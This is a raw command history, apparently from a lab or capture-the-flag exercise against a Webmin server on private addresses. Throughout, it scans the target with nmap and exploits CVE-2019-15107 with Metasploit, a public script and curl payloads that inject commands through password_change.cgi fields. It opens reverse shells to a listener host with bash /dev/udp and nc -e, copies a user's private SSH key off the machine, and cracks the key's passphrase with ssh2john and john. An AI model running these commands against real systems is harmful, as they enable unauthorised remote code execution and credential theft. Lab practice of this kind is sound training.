msfrpcd -h
msfrpcd -h
python -v
help
help search
search cve:2019
search cve:2019 type:exploit platform:-linux
info 45
use exploit/linux/http/webmin_backdoor
ls
cat ssh2john.py
./ssh2john.py
ssh2john.py
python ssh2john.py
cd ..
ls
cd ..
ls
cd root
ls
cd bin
ls
CVE-2019-15107cd ..
cd ..
ls
exit
msfconsole
use exploit/linux/http/webmin_backdoor
ls
cd ..
ls
cd ..
ls
cd root
cd ./root
cat root
exit
msfconsole
msf
use exploit/linux/http/webmin_backdoor
set RHOSTS 172.18.1.5
RPORT 10000
set RPORT 10000
set LHOST 10.1.135.83
exploit
help
exploit
nmap
nmap 172.18.1.5
nmap 172.18.1.5 --script=vuln
nmap 172.18.1.5 -script=vuln
nmap 172.18.1.5 -sV
metasploit
msfE
msf5
use exploit/unix/webapp/webmin_backdoor
show targets
show options
set LHOST 10.1.135.83
set RHOST 172.18.1.5
set SSL true
exploit
run
set SSL false
ifconfig
exploit
nmap -sP 192.168.128.0/17
ls
touch id_rsa
nano id_rsa
python ssh2john.py id_rsa > hash
ls
cat hash
ls
john
ls /
ls /local
ls /home
ls /home/kali
ls /home/debian
ls /home/user
ls /home/user-access
ls Downloads
ls /usr/share
ls /usr/share/john
john hash -wordlist=/usr/share/john/password.lst
ls /usr/share/wordlists
john hash -wordlist=/usr/share/wordlists/rockyou.txt
ping 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
ping 172.18.1.5
nmap 172.18.1.5
nmap --script vuln 172.18.1.5
man nmap
nmap --script vuln 172.18.1.5
nmap -sU 172.18.1.5
sudo nmap -sU 172.18.1.5
sudo nmap --script vuln 172.18.1.5
sudo nmap -sV 172.18.1.5
sudo nmap --script vuln 172.18.1.5 -p 10000
man nmap
sudo nmap --script=vuln 172.18.1.5 -p 10000
wget https://www.exploit-db.com/download/47230
ll
git clone https://github.com/rapid7/metasploit-framework.git
cat 47230
ll
ruby 47230
ll
cd metasploit-framework
ll
msfconsole
11
pwd
ll
ll
cd metasploit-framework
ll
search msfconsole
search webmin
use exploit/linux/http/webmin_backdoor
pwd
exploit
run
help
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
run
ls -la
cd ..
ls -la
mkdir ssh-secret-server
cd ssh-secret-server
vim id_rsa
ls -la
vim id_rsa
vim id_rsa
vim id_rsa
vim id_rsa
ls -la
man ssh
ssh -i id_rsa 10.1.17.4
chmod 600 id_rsa
ssh -i id_rsa 10.1.17.4
ls -la /usr/share/wordlist
ls -la /usr/share/
ls -la /usr/share/wordlists
man john
python3 ssh2john.py id_rsa > hash
pwd
python3 ssh2john.py id_rsa > hash
cd /home
ls
cd kali
ls
python3 ssh2john.py ssh-secret-server/id_rsa > hash
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
man john
john -show passwd
ls -la
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ping 172.18.1.5
nmap 172.18.1.5
cat etc/services
cat /etc/services
egrep -w '22/(tcp)' /etc/services
nmap 172.18.1.5
egrep -w '1000/(tcp)' /etc/services
egrep -w '1000/(snet-sensor-mgmt)' /etc/services
egrep -w '10000/(snet-sensor-mgmt)' /etc/services
nmap -sV -0  172.18.1.5
nmap -sV -O  172.18.1.5
sudo nmap -sV -O  172.18.1.5
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar'
curl https://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar'
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar' -H"Referer: http://172.18.1.5:10000"
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar' -H"Referer: http://172.18.1.5:10000"
curl http://172.18.1.5:10000/password_reset.cgi -d 'user=root&pam&expired&old=wrong|ifconfig&new1=bar&new2=bar' -H "Referer:http://172.18.1.5:10000"
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar' -H"Referer: http://172.18.1.5:10000"
show
show all
use exploit/unix/post/windows/manage/pxeexploit
use post/windows/manage/pxeexploit
exit
msfconsole search
show
show all
use /webapp/webmin_backdoor
use webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
http://172.18.1.5:10000
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
python3 ssh2john.py rsa_private > hash
fping
fping 172.18.1.5
nmap -sS -half-open 172.18.1.5
nmap -sS 172.18.1.5
sudo nmap -sS 172.18.1.5
snmpcheck -t 172.18.1.5
sudo nmap -A 172.18.1.5
ssh 172.18.1.5
ssh admin@172.18.1.5
cd Downloads
ls
ruby 47230.rb
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \\n  chmod 755 msfinstall && \\n  ./msfinstall
ruby 47230.rb
msfcli
ls
ruby 47230.rb
ls
sudo ruby 47230.rb
cd Downloads/
msfconsole
ipconfig
ip a
cd Downloads/
use
ruby 47230.rb
use 47230.rb
ruby 47230.rb
vim 47230.rb
use .
show options
run
use .
show options
show options
set RHOSTS 172.18.1.5
show options
ls
set options
use 47230
exploit
use 47230.rb
use 4328
set LHOST 10.1.135.83
run
msfconsole -q
ls
cd Downloads/
use .
use . | grep remote
use . > file
use . remote
use . unauthenticated remote
use . unauthenticated remote code
use . unauthenticated remote code execution
y
show options
exploit/multi/http/wp_ait_csv_rce
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
set ForceExploit true
exploit[B
set RPORT 1000
exploit
ip a
exploit
set RPORT 80
exploit
exit
set LHOST 127.0.0.1
msfconsole -q
use exploit/linux/http/webmin_backdoor
cd Downloads/
use . unauthenticated remote code execution
search webmin
show options
set RPORT 1000
exploit
set ForceExploit true
exploit
show options
ip a
show options
exploit
set LPORT 1000
set RHOST 172.18.1.5
check
use . unauthenticated remote code execution metasploit
set LHOST 10.1.135.83
exploit
set LPORT 4444
show options
set LPORT 10000
exploit
show options
set RPORT 10000
set LPORT 4444
show options
exploit
ls
ls
cat CHANGELOG
cd ..
ls
cd mailboxes
ls
cd ..
cd ..
ls
cd games
ls
cd ..
ls
cd ..
ls
cd ..
ld
ls
cd home
ls
cd alice/
ls
cd ..
cd debian/
ls
cd ..
cd /usr/local/webmin
ls
cat passwd
cd pa
cd passwd
ls
ip a
/usr/local/webmin
ls -a /home/eve
less .bash_history
cd /home/eve
less .bash_history
q
ls -a
cat .bash
ls -a
cat .bash_history
cd /media/eve
ls
ls -la
cd ~/Documents
cd -
ls
cd ..
ls
cd Documents
cd ..
ls
cd /home/eve/.ssh
ls
cat id_rsa
gedit
su
ls
python3 ssh2john.py Documents/id_rsa > hash
john --wordlist=/usr/share/wordlist/rockyou.txt hash
nmap 172.18.1.5 -sVC --version-intensity 5
sudo nmap 172.18.1.5 -sVC --version-intensity 5
searchsploit webmin
git clone https://github.com/jas502n/CVE-2019-15107
cd CVE-2019-15107
ls
python3 CVE_2019_15107.py
python3 CVE_2019_15107.py
python2 CVE_2019_15107.py
python2 CVE_2019_15107.py
python2 CVE_2019_15107.py
python2 CVE_2019_15107.py http://172.18.1.5:10000 cmd
python2 CVE_2019_15107.py http://172.18.1.5:10000 bash
python2 CVE_2019_15107.py http://172.18.1.5:10000 id
ifconfig
vim revshell
cat revshell
python2 CVE_2019_15107.py http://172.18.1.5:10000 'bash -i >& /dev/udp/10.1.135.83/4242 0>&1'
python2 CVE_2019_15107.py http://172.18.1.5:10000 'sh -i >& /dev/udp/10.1.135.83/4242 0>&1'
python2 CVE_2019_15107.py http://172.18.1.5:10000 'nc 10.1.135.83 4242'
nc -lvp 4242
vim id_rsa
ssh -i ./id_rsa eve@10.1.17.4
chmod 0644 ./id_rsa
ssh -i ./id_rsa eve@10.1.17.4
chmod 0600 ./id_rsa
ssh -i ./id_rsa eve@10.1.17.4
ssh -i ./id_rsa eve@10.1.17.4
nc -lvp 4242
python2 CVE_2019_15107.py http://172.18.1.5:10000 'nc 10.1.135.83 4242 -e /bin/bash'
vim shadow
john shadow
john shadow --wordlist=/usr/share/wordlists/rockyou.txt
vim notadmin
john notadmin --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i ./id_rsa eve@10.1.17.4
locate ssh2john.py
python3 /usr/share/john/ssh2john.py id_rsa
python /usr/share/john/ssh2john.py id_rsa
python /usr/share/john/ssh2john.py id_rsa > jtr
john jtr
john jtr --wordlist=/usr/share/wordlists/rockyou.txt
ls
cd top-secret/
ls
cat flag.txt
ifconfig
ifconfig
ifconfig
ifconfig
ifconfig
ifconfig
ifconfig
ifconfig
nmap -sP 192.168.129.132
nmap -sP 192.168.129.132
nmap -sP 192.168.129.132
nmap -sP 192.168.129.132
nmap -sP 192.168.129.132/24
nmap 192.168.129.132/24
nmap 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
metasploit
msconf
search
search name
search MiniServ 1.920
search webmin
info exploit/linux/http/webmin_backdoor
ls
mkdir cve
cd cve
git clone https://github.com/jas502n/CVE-2019-15107.git
ls
cd CVE-2019-15107
ls
ls
ls
python CVE_2019_15107.py 172.18.1.5:10000 cmd
exit
msfconsole
info exploit/linux/http/webmin_backdoor
exploit(linux/http/webmin_backdoor) > set RHOSTS 172.18.1.5
exploit linux/http/webmin_backdoor > set RHOSTS 172.18.1.5
linux/http/webmin_backdoor > set RHOSTS 172.18.1.5
info
set RHOST 172.18.1.5
info
exploit
set LHOST a
exploit
info
python CVE_2019_15107.py 172.18.1.5:10000 cmd
python CVE_2019_15107.py 172.18.1.5:10000 cmd
ip a
ip a
set LHOST 172.18.1.5
exploit
ssh 0.0.0.0:4444
run
ip a
set LHOST 10.1.135.83
ssh 172.18.1.5:35102
ssh 10.1.135.83:4444
exploit
set LHOST 10.1.135.83
run
ls
cd .ssh
ls
ls
ls
ls
cd ..
cd ..
ls
cd .ssh
ls
ls
ls -a
ls
nano id_rsa
nano id_rsa
ls
python ssh2john.py id_rsa > hash
ls
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ping 172.18.1.5
help
ls
vim ssh2john.py
ssh user@172.18.1.5
nmap -A 172.18.1.5
nmap -sS 172.18.1.5
sudo nmap -sS 172.18.1.5
nmap --open -A 172.18.1.5
nmap --open 172.18.1.5
nmap --help
nmap -sV -p 10000 172.18.1.5
curl -4 172.18.1.5:10000 -d /password_reset.cgi?user=root&pam&expired&old=wrong
mfconsole
--help
search webmin
use exploit/unix/webapp/webmin_backdoor
exploit
options
set RHOSTS 172.18.1.5
options
exploit
use path-to-exploit
show options
exit
msfconsole
ipconfig
ip a
ip
ip --help
ip -4
set LHOST 10.1.135.83
use exploit/unix/webapp/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
ls
cat .bash_history
ls
cd root
ls
cd ..
cd home
ls
ls -a /home/exe
ls
cd eve/
ls
less .bash_history
ls
cd ..
ls
ls
cd ..
ls
find . -type d -name "top-secret"
ls
ls -a
cd home
ls
cd eve
ls -a
cd .ssh
ls
scp id_rsa kali@10.1.135.83:/remote/directory
ls
scp id_rsa kali@10.1.135.83
ls
cd ..
ls
cd ..
ls
exploit
sessions -u 1
uname -ms;echo OduDrwSUggCVVVjLAKrKKfgZUybxIGal
python -V 2>&1;echo ILTcZPuTIkHhapCyGQKCrONaJrKLWhiK
sessions -i 2
ls
cd root
cd /root
ls
cd ..
ls
cd home
ls
cd eve
ls
ls -a
cd .ssh
ls
exploit
sessions -u 2
uname -ms;echo rIDyxmpmpPJNkXGkqcRJIrNFhBfSaynV
python -V 2>&1;echo IvFEBlnKzZNjzIwLKpvHnXeVhEynwvWr
exit
exit -y
msfconsole
ping 172.18.1.5
nmap 172.18.1.5
nmap --help
nmap 172.18.1.5
nmap -sV
nmap -sV 172.18.1.5
exit
msfconsole
search Webmin
use exploit/unix/webapp/webmin_upload_exec
exit
msfconsole
search Webmin
use  exploit/unix/http/webmin_backdoor
set RHOSTS 172.18.1.5.
set RPORT 10000
run
set RHOSTS 172.18.1.5.
set LHOST 10.1.135.83.
exploit
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
exit
msfconsole
use  exploit/unix/http/webmin_backdoor
search webmin
use exploit/unix/http/webmin_backdoor
use exploit/unix/webapp/webmin_upload_exec
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
exit
msfconsole
clear
nmap 172.18.1.5
nmap 172.18.1.5 -p10000
nmap 172.18.1.5 -p10000 -sC -sV
search webmin
use 0
info
settings
set
help
options
search webmin
use 2
options
search webmin
use 3
options
search webmin
use 5
options
ip addr show
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
exploit
ls
cd ..
cd ..
cd ..
cd ...
cd /root
ls
cat WARNING*
ls
ls -la
cd /home
ls
cd alice
ls
ls -la
cd ../eve
ls
ls -la
cat .bash_history
ls
cd .ssh
ls
python -m http.server
python3 -m http.server
scp -r 172.18.1.5:8080/* .
wget 172.18.1.5:8000/id_rsa
ls
./ssh2john.py --help
./ssh2john.py id_rsa
./ssh2john.py id_rsa > john.thing
ls
cat john.thing
cat john.thing
john --wordlist=/usr/share/wordlists/rockyou.txt john.thing
nmap 172.18.1.5
ping 172.18.1.5
nmap -v -A 172.18.1.5
nmap -p 10000
nmap
nmap -v -A -p 10000 172.18.1.5
nikto -H
nmap
nmap | grep CVE
nmap | grep scri
nmap --script=
nmap --script= 172.18.1.5
nmap --script= 172.18.1.5
nmap --script= 172.18.1.5
nmap --script= 172.18.1.5
nmap --script= 172.18.1.5
nikto -H
nmap --script "http-*"
nmap --script "http-*" 172.18.1.5
nmap -sV 172.18.1.5
use exploit/linux/http/webmin_backdoor
help
check
set RHOSTS 172.18.1.5
check
exploit
set LHOST 0.0.0.0
exploit
ipfonfig /all
ipconfig /all
man nmap
ipconfig /all
ifconfig /all
ifconfi
ifconfig
set LHOST 192.168.131.72
exploit
exit
bash
set LHOST 10.1.135.83
man nmap
arping
arping --help
ifconfig
ifconfig
ifconfig
ifconfig
ifconfig
nmap -sn 192.168.129.158/25
nmap -sn 192.168.129.0/25
nmap -sn 172.18.1.5/24
exploit
cd ~/.ssh
nano private_key
nano private_key
nano private_key
nano private_key
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ssh eve@10.1.17.4
man ssh
ssh -i private_key eve@10.1.17.4
ssh -i private_key eve@10.1.17.4
ssh -i private_key eve@10.1.17.4
chmod 700 private_key
ssh -i private_key eve@10.1.17.4
arping --help
ls
ls
ls
ls
ls
ls
ls
locate ssh2john.py
python home/kali/ssh2john.py private_key > private_key.hash
python /home/kali/ssh2john.py private_key > private_key.hash
python /home/kali/ssh2john.py private_key > private_key.hash
python /home/kali/ssh2john.py private_key > private_key.hash
ls
ls
john private_key.hash -wordlist=/usr/share/wordlists
john private_key.hash -wordlist=/usr/share/wordlists/rockyou.txt
ping 172.18.1.5
nmap  172.18.1.5
nmap  -A -p 10000 172.18.1.5
nmap -sV -p 10000 --script=vulscan/vulscan.nse
man nmap
cd /usr/share/nmap
l
cd scripts
l
nmap  -sV -p 10000 --script=vulners  172.18.1.5
search CVE-2019-15107
use 0
show options
set SRVHOST 172.18.1.5
exploit
ip a
set LHOST 10.1.135.83
show options
exploit
set RHOSTS 172.18.1.5
set SRVHOST 10.1.135.83
show options
exploit
ip a
nmap -sV 100.100.100.0/24
cd Desktop
nc nvlp 4444
nc -nlvp 4444
ls
exploit
ip a
ip a
ip a
man mfsconsole
sessions
exploit
nc -nlvp 4444 > file.txt
man scp
cd Desktop
ls
rm file.txt
nc -nlvp  12345 > file.txt
ls
less file.txt
nc -nlvp  12345 > file.txt
ls
less file.txt
nc -nlvp  12345 > file.txt
less file.txt
ls
nc -nlvp  12345 > file.txt
ls
less file.txt
rm file.txt
nc -nlvp  12345 > file.txt
less file.txt
rm file.txt
nc -nlvp  12345 > file.txt
less file.txt
less file.txt
cd  Desktop
vim id_rsa
vim id_rsa
vim id_rsa
ls
ssh2john
sudo apt install john-data
ssh2john id_rsa > hash.txt
less hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
hashcat hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt
less hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
shasum id_rsa
vim id_rsa
vim id_rsa
ssh2john id_rsa > hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
less hash.txt
less /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | wc -;
cat /usr/share/wordlists/rockyou.txt | wc -l
john hash.txt
less id_rsa
less id_rsa
less id_rsa
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john --show id_rsa
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
cd /usr/share/ri
cd /usr/share/ri
cd /usr/share/ri
cd /usr/share/wordlists
l
gunzip rockyou.txt.gz
cd
cd Desktop
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show id_rsa
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
less hash.txt
less hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH
shasum id_rsa
ssh2john --version
ssh2john -version
ssh2john help
ssh2john
ls -la /usr/bin/ssh2john
less /usr/share/john/ssh2john.py
less /usr/share/john/ssh2john.py
python3 ssh2joshn id_rsa > hash
python3 ssh2john id_rsa > hash
python3 /usr/share/john/ssh2john.py id_rsa > hash
ls
john --wordlist=/usr/share/wordlists/rockyou.txt hash
less id_rsa
ls
ssh-keygen -p
chmod 600 id_rsa
ssh-keygen -p
grep -i picachu /usr/share/wordlists/rockyou.txt
grep -i picachu /usr/share/wordlists/rockyou.txt
grep -i picachu /usr/share/wordlists/rockyou.txt
grep -ir /usr/share/wordlist
grep -ir  pikachu /usr/share/wordlists
grep -ir  pikachu /usr/share/wordlists
nmap
nmap -sL
nmap -sS
ifconfig
arp -a
nmap -sS 192.168.128.74
nmap -sp 192.168.128.74
nmap -sV 172.18.1.5
use exploit/linux/http/webmin_backdoor
mfs exploit(webmin_backdoor) > exploit
exploit(webmin_backdoor) > exploit
mfs6 exploit(webmin_backdoor) > exploit
run
show info
exploit
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd share
ls
cd wordlists
ls
cat rockyou.xt
cat rockyou.txt
cd ..
cd ..
cd
ls
cd hashes
cd hash
cat hash
ls -la
ipconfig
nmap -sP 172.18.1.5
nmap -sTU -O 172.18.1.5
sudo nmap -sTU -O 172.18.1.5
sudo lsof -i -P -n | grep "LISTEN"
sudo nmap -sTU -O 172.18.1.5
sudo nmap -sTU -O 172.18.1.5
nmap --help
nmap -v -sn 172.18.1.5
nmap -sL 172.18.1.5
nmap 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
nmap -p 80 172.18.1.5
nmap -F 172.18.1.5
nmap -sT 172.18.1.5
sudo nmap -sTU -O 172.18.1.5
nmap -sV -p 80 172.18.1.5
nmap -sV 172.18.1.5
ll
cd Documents
ll
touch CVE-2019-15107.sh
chmod +x CVE-2019-15107.sh
vim CVE-2019-15107.sh
cat CVE-2019-15107.sh
vim
vim CVE-2019-15107.sh
ls
sh CVE-2019-15107.sh https:172.18.1.5:10000
sh CVE-2019-15107.sh http:172.18.1.5:10000
nmap -sV 172.18.1.5
searchsploit webmin
ls
touch exploit
vim exploit
cat exploit
vim exploit
vim exploit
--help
help
check 172.18.1.5:10000
check 172.18.1.5
msfconsole
msfconsole
touch exploit.py
vim exploit.py
vim exploit.py
python exploit.py https://172.18.1.5:10000 cmd
python3 exploit.py https://172.18.1.5:10000 cmd
python exploit.py https://172.18.1.5:10000 cmd
mv ~/Downloads/47230.rb .
ll
ruby 47230.rb
ruby 47230.rb 172.18.1.5
search
search cve:2019-15107
use exploit/linux/http/webmin_backdoor
?
172.18.1.5
connect 172.18.1.5
connect 172.18.1.5 10000
connect -h 172.18.1.5 10000
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
background
download id_rsa
msfconsole
background
exit
msfconsole
ls
touch eve_rsa
vim eve_rsa
vim eve_rsa
python3 /home/kali/ssh2john.py eve_rsa > hash
ls
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ping 172.18.1.5
man nmap
man nmap
nmap -A -T4 172.18.1.5
help
search
search cve:CVE-2019-15107
use exploit/linux/http/webmin_backdoor
exit
msfconsole
use exploit/unix/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show options
RHOSTS 172.18.1.5
set RHOSTS 172.18.1.5
show options
set SRVHOST 10.1.135.83
exploit
set LHOST 172.18.1.5
exploit
set LHOST 10.1.135.83
arp -a
ls -l /home
ls -l /home/user-access
ls -l /home/use
ls -l /home/user
ls -l /home/debian
ls -l /home/kali
cat ssh2john.py
ls -l /home/kali
python ssh2john.py
man ls
man ls -la
ls -la /home
ls -la /home/debian
ls -la /home/kali
nano id_rsa
ping  172.18.1.5 is
ping  172.18.1.5
ping  172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
ssh root@172.18.1.5
telnet 127.18.1.5 10000
telnet 127.18.1.5 22
nmap 172.18.1.5 -p 10000
telnet 127.18.1.5 10
netstat -lpn | grep 10000
nmap -h
nmap -sV 127.18.1.5
nmap -sV 127.18.1.5 -p 10000
nmap -sV 127.18.1.5 -p 10000
nmap -sV 127.18.1.5 -p 10000
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap 172.18.1.5
searchsploit webmin
wpscan --url http://127.18.1.5
wpscan 127.18.1.5
-help
help
check 127.168.1.5
check 127.18.1.5
-check 127.18.1.5
analyze 127.18.1.5
connect 127.18.1.5
connect 127.18.1.5 10000
search 127.18.1.5
help
connect 127.18.1.5 10000
search exploit/unix
use exploit/linux/http/webmin_backdoor
set rhosts 172.18.1.5
run
search exploit/unix
use exploit/unix/webapp/webmin_backdoor
msfconsole
use exploit/unix/webapp/webmin_backdoor
show targets
set rhosts 172.18.1.5
run
set TARGET 172.18.1.5
exploit
search exploit/unix/webmin
search exploit/unix
search exploit/unix/webmin
search exploit/unix/webapp/webmin
use exploit/unix/webapp/webmin_upload_exec
set rhosts 172.18.1.5
run
exploit
set TARGET 172.18.1.5
exploit
options
run
use exploit/unix/webapp/webmin_backdoor
set TARGET 172.18.1.5
set rhosts 172.18.1.5
run
exploit
use path-to-exploit
options
show options
targeturi /root/
targeturi
vhost 10.1.135.83
set vhost 10.1.135.83
run
exploit
options
set vhost
set srvhost 10.1.135.83
run
explit
exploit
options
set lhost 10.1.135.83
exploit
set srvhost 0.0.0.0
run
exploit
options
exit
msfconsole
ms
use exploit/unix/webapp/webmin_backdoor
options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
run
run
exploit
exit
exit -y
msfconsole
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
background
exit
msfconsole
ls -a
cd .ssh
ls -a
cat id_rsa
touch id_rsa
ls -a
nano id_rsa
cat id_rsa
nano id_rsa
cat id_rsa
cat id_rsa
cat id_rsa
cat id_rsa
cat id_rsa
rm id_rsa
touch id
rm id
touch id_rsa
ls
nano
nano
cat id_rsa
python3 ssh2john.py id_rsa > hash
cat id_rsa
python3 ssh2john.py id_rsa > hash
python3 ssh2john.py id_rsa > hash
cd ..
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
cat /home/kali/.john
cd /home/kali/.john
ls -a
man nmap
nmap -A -T4
nmap -A -T4
ifconfig
nmap -A -T4 192.168.0.1
nmap -A -T4 192.168.0.1/24
nmap -A -T4 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
nmap 172.18.1.5
ifconfig
nmap -p- 172.18.1.5
ssh  172.18.1.5
telnet 172.18.1.5:10000
nmap -p- 172.18.1.5
nmap -sV  -p- 172.18.1.5
nmap -sV  -p- 172.18.1.5
nmap -sV  -p- 172.18.1.5
ssh  172.18.1.5
ssh  172.18.1.5
nmap -p- 172.18.1.5
man metaflac
msf
msfconsole
man msfconsole
man msfd
exploit
help
search webmin
use 5
info
set RHOST 172.18.1.5
info
show options
run
info
ifconfig
set LHOST eth0
run
set SSL true
ifno
info
run
set SSL false
run
set LHOST eth1
run
ls
nmap
nmap
exit
msfconsole
nmap  172.18.1.5 /24
nmap  172.18.1.5/24
nmap  172.18.1.5/24
nmap  172.18.1.5/24
nmap  172.18.1.5/16
search webmin
use 5
info
set LHOST eth1
set RHOST 172.18.1.5
run
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDxoloLhr6z3ODwUs3yYJJGmybqUhTA9/OxJezxrMKTJvBaENHglDkzSDdolWDia7LTol0f2NFWgwAqL4W6W5xfmQ1gWVCCtsLxF6QuyPHfya/QZXl9dhBd2fuv994SUJ2NriZFJQ6iuJV/rr6T9sifTW
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDxoloLhr6z3ODwUs3yYJJGmybqUhTA9/OxJezxrMKTJvBaENHglDkzSDdolWDia7LTol0f2NFWgwAqL4W6W5xfmQ1gWVCCtsLxF6QuyPHfya/QZXl9dhBd2fuv994SUJ2NriZFJQ6iuJV/rr6T9sifTW
Do0TFcW7tIqLCr5mHorQ7u+Iw7uMeoSTVGpFI2H4aJ6q+MHyNxAEGUdmMwMcHQ9/WAzgM4T/RbPd4bzuqblMO2n2UsoF8yRqXiKT3AezX3X/87poSpU7hHVSTbbDKoZCMp6WmxH7KKnVjpGJhbbvxyQrj5kDcA+6W2v7bDaJFcCXd05txC+x+yANQkkHMH
Do0TFcW7tIqLCr5mHorQ7u+Iw7uMeoSTVGpFI2H4aJ6q+MHyNxAEGUdmMwMcHQ9/WAzgM4T/RbPd4bzuqblMO2n2UsoF8yRqXiKT3AezX3X/87poSpU7hHVSTbbDKoZCMp6WmxH7KKnVjpGJhbbvxyQrj5kDcA+6W2v7bDaJFcCXd05txC+x+yANQkkHMH
973siDqsbiqH8ntwCERySM+qsU9OzvWOd/h1xTgMLrYBLy2r3JC+t75Q/PfI55Z6KNaDK1nt4X4WpJWGysNVNRDCGK0rMBRBPJcpgcXMonD7jV8T7wB/MXwQQwIPBnTjh5MpmHeATJbEaHvZJ7zXbERPgjTl8YU6V5b/CN/M0miJDSVwhoWTZIHD64/6lV
973siDqsbiqH8ntwCERySM+qsU9OzvWOd/h1xTgMLrYBLy2r3JC+t75Q/PfI55Z6KNaDK1nt4X4WpJWGysNVNRDCGK0rMBRBPJcpgcXMonD7jV8T7wB/MXwQQwIPBnTjh5MpmHeATJbEaHvZJ7zXbERPgjTl8YU6V5b/CN/M0miJDSVwhoWTZIHD64/6lV
ilay8BRBQ+yaUxD/eZOVOlb4nCQ9lyICXg41iyMCe0jazNT/bsqxMSZeggJrfQ5aZZ83K7vBIb4MGlYLpqBgXNJDIHNy0409IShb8RJ5y1qX/Jy3YETww9sTC+jZxhFb6GEa2wnmXK6tLwurofmVtPuQ==
nano key
nano key
nano key
nano key
nano key
nano key
cat key
nano key
ssh -i key 10.1.17.4
ssh -i key eve@10.1.17.4
ls
python ssh2john.py
python ssh2john.py key
python ssh2john.py key > key.john
john key.john
john key.john
john key.john
john key.john
john --wordlist=/usr/share/wordlists/rockyou.txt key
john --wordlist=/usr/share/wordlists/rockyou.txt key.john
john --wordlist=/usr/share/wordlists/rockyou.txt key.john
nmap
nmap -v 172.18.1.5
nmap -v -sv 172.18.1.5
nmap -v -sV 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
ssh root@172.18.1.5
passwd --help
curl -XPOST 172.18.1.5:10000/password_change.cgi -f user=root -f old=test|echo "hey"
curl -XPOST  -f user=root -f old=test|echo "hey" 172.18.1.5:10000/password_change.cgi
curl -XPOST  -F user=root -F old=test|echo "hey" 172.18.1.5:10000/password_change.cgi
curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi
curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi | grep 'hello'
curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi --referrer '172.18.1.5' | grep 'hello'
curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi --referer '172.18.1.5' | grep 'hello'
curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi --referer '172.18.1.5'
